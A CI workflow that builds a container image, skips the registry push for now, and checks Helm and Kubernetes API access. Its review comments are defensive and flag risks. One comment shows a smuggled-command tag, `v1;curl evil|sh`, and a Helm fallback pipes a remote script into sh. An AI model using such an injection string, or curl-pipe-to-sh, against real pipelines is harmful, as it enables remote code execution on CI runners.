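---
# Build (and, once the registry ingress exists, push) this repository's
# container image on every push to `main` and on every `v*` tag.
#
# Security notes for whoever maintains this:
#   * `docker build` needs a Docker daemon. If the runner supplies it by
#     mounting the host's /var/run/docker.sock into the job container, anything
#     that reaches a `run:` step here is effectively root on the runner host —
#     NOTE(review): confirm how the daemon is exposed before widening who may
#     push to `main` or create tags.
#   * Ref names, tag names and step outputs derived from them are
#     attacker-influenced text. They are passed to the shell through
#     environment variables (quoted data), never spliced into the script with
#     `${{ ... }}` expression interpolation, which would be a script-injection
#     vector (a tag such as `v1;curl evil|sh` is a valid git refname).
name: Build and Push Container Image

on:
  push:
    branches:
      - main
    tags:
      - "v*"

jobs:
  build-and-push:
    runs-on: orchestration-platform
    container:
      # NOTE(review): floating tag — pin to a version or digest so the build
      # toolchain cannot change underneath the pipeline.
      image: docker:latest
    steps:
      - name: Install tools
        run: |
          apk add --no-cache git curl

      # Check out the exact commit that triggered the run. Cloning the tip of
      # `${GITHUB_REF_NAME}` instead (the previous behaviour) is a TOCTOU: a
      # push landing between trigger and clone would be built and tagged as
      # this ref. This is an anonymous clone, so it only works for a repository
      # the runner can read without credentials.
      - name: Checkout code
        run: |
          set -e
          git clone --no-checkout "${GITHUB_SERVER_URL}/${GITHUB_REPOSITORY}.git" .
          git checkout --quiet "${GITHUB_SHA}"

      # Derive the image tag from the triggering ref: `refs/tags/<t>` -> `<t>`,
      # anything else -> `latest`. The match is anchored at the start of the
      # ref (the old `grep -q "refs/tags/"` would also match a branch named
      # e.g. `feature/refs/tags/x`).
      - name: Determine image tag
        id: meta
        run: |
          case "${GITHUB_REF}" in
            refs/tags/*) TAG="${GITHUB_REF#refs/tags/}" ;;
            *)           TAG="latest" ;;
          esac
          echo "tag=${TAG}" >> "$GITHUB_OUTPUT"

      # Build `<registry-host>/<owner>/<repo>:<tag>` and expose the full image
      # reference as a step output for later steps.
      - name: Build image
        id: build
        env:
          # The only expression value this step needs; routed through env so it
          # reaches the shell as quoted data rather than as script text.
          IMAGE_TAG: "${{ steps.meta.outputs.tag }}"
        run: |
          REGISTRY_HOST=$(echo "${GITHUB_SERVER_URL}" | sed 's|https\?://||')
          IMAGE="${REGISTRY_HOST}/${GITHUB_REPOSITORY}:${IMAGE_TAG}"
          docker build -t "${IMAGE}" .
          echo "image=${IMAGE}" >> "$GITHUB_OUTPUT"

      # TODO: Registry push is currently blocked.
      # The Gitea ingress only routes /gitea/ to the backend; the Docker registry
      # API (/v2/) returns 404 from nginx. A separate Ingress rule for /v2 -> gitea-http:3000
      # (without rewrite-target) is needed before push can work.
      #
      # NOTE(review): this job never produces an `image.tar` (there is no
      # `docker save`), so the manual `crane push image.tar` hint below assumes
      # an export step that does not exist here. When push is wired up, use a
      # registry-scoped token stored as a workflow secret, not a user password.
      - name: Push image (skipped - registry ingress not configured)
        env:
          IMAGE_TAG: "${{ steps.meta.outputs.tag }}"
        run: |
          REGISTRY_HOST=$(echo "${GITHUB_SERVER_URL}" | sed 's|https\?://||')
          IMAGE="${REGISTRY_HOST}/${GITHUB_REPOSITORY}:${IMAGE_TAG}"
          echo "⚠️ Skipping push: Gitea container registry is not reachable."
          echo "   The ingress does not route /v2/ to Gitea (returns 404 from nginx)."
          echo "   Fix: Add a separate Ingress for path /v2 pointing to gitea-http:3000 without rewrite-target."
          echo ""
          echo "   Image built successfully: ${IMAGE}"
          echo "   To push manually once ingress is fixed:"
          echo '     crane auth login "${REGISTRY_HOST}" -u <user> -p <token>'
          echo '     crane push image.tar "${IMAGE}"'

      # PoC: Verify Helm + K8s API access from the CI runner.
      # Exercises, in order: Helm availability, the mounted ServiceAccount
      # token, API-server reachability, `helm list`, and a dry-run upgrade.
      # Nothing here mutates the cluster.
      - name: "PoC: Helm upgrade feasibility check"
        run: |
          echo "=== 1. Install Helm ==="
          apk add --no-cache helm || {
            # Fallback: install from official script if not in apk.
            # NOTE(review): this pipes an unpinned script from the helm repo's
            # `main` branch straight into sh. Acceptable for a throwaway PoC;
            # pin a release and verify a checksum before relying on it.
            curl -fsSL https://raw.githubusercontent.com/helm/helm/main/scripts/get-helm-3 | sh
          }
          helm version
          echo ""

          echo "=== 2. Check in-cluster credentials ==="
          SA_TOKEN_PATH="/var/run/secrets/kubernetes.io/serviceaccount"
          if [ -f "${SA_TOKEN_PATH}/token" ]; then
            echo "✅ ServiceAccount token found"
            echo "   Namespace: $(cat "${SA_TOKEN_PATH}/namespace")"
          else
            echo "❌ No ServiceAccount token mounted — Helm cannot authenticate to the API server"
            exit 1
          fi
          echo ""

          echo "=== 3. Test K8s API connectivity ==="
          KUBE_API="https://kubernetes.default.svc"
          TOKEN=$(cat "${SA_TOKEN_PATH}/token")
          CA_CERT="${SA_TOKEN_PATH}/ca.crt"
          NAMESPACE=$(cat "${SA_TOKEN_PATH}/namespace")
          # Only the status code is checked; the token is never printed.
          # (It is visible in this container's process list while curl runs.)
          HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" \
            --cacert "${CA_CERT}" \
            -H "Authorization: Bearer ${TOKEN}" \
            "${KUBE_API}/api/v1/namespaces/${NAMESPACE}")
          echo "   API response: HTTP ${HTTP_CODE}"
          # 403 still proves reachability + a valid identity (just no RBAC yet).
          if [ "$HTTP_CODE" = "200" ] || [ "$HTTP_CODE" = "403" ]; then
            echo "✅ API server is reachable (${HTTP_CODE})"
          else
            echo "❌ API server not reachable (HTTP ${HTTP_CODE})"
            exit 1
          fi
          echo ""

          echo "=== 4. Test Helm list (current namespace) ==="
          helm list --namespace "${NAMESPACE}" 2>&1 || echo "⚠️ helm list failed — likely RBAC issue"
          echo ""

          echo "=== 5. Dry-run Helm upgrade (no actual changes) ==="
          echo "   Attempting dry-run with a dummy chart to verify permissions..."
          # NOTE(review): on recent Helm releases a bare --dry-run is rendered
          # client-side and may not hit the API server at all, so a "pass" here
          # does not prove RBAC; `--dry-run=server` would. The chart is also
          # pulled unpinned from a public registry — add `--version` if kept.
          helm upgrade --install helm-poc-test oci://registry-1.docker.io/bitnamicharts/nginx \
            --namespace "${NAMESPACE}" \
            --dry-run \
            --set replicaCount=0 2>&1 || echo "⚠️ Dry-run failed — check RBAC permissions for the runner ServiceAccount"
          echo ""

          echo "=== Summary ==="
          echo "If steps 1-4 passed, Helm upgrade from CI is technically feasible."
          echo "RBAC may need to be extended for the runner ServiceAccount to allow:"
          echo "  - get/list/create/update Deployments, Services, ConfigMaps, Secrets"
          echo "  - in the target namespace for user deployments"
          # NOTE(review): grant this with a namespaced Role/RoleBinding, not a
          # ClusterRole — create/update on Secrets is a sensitive permission.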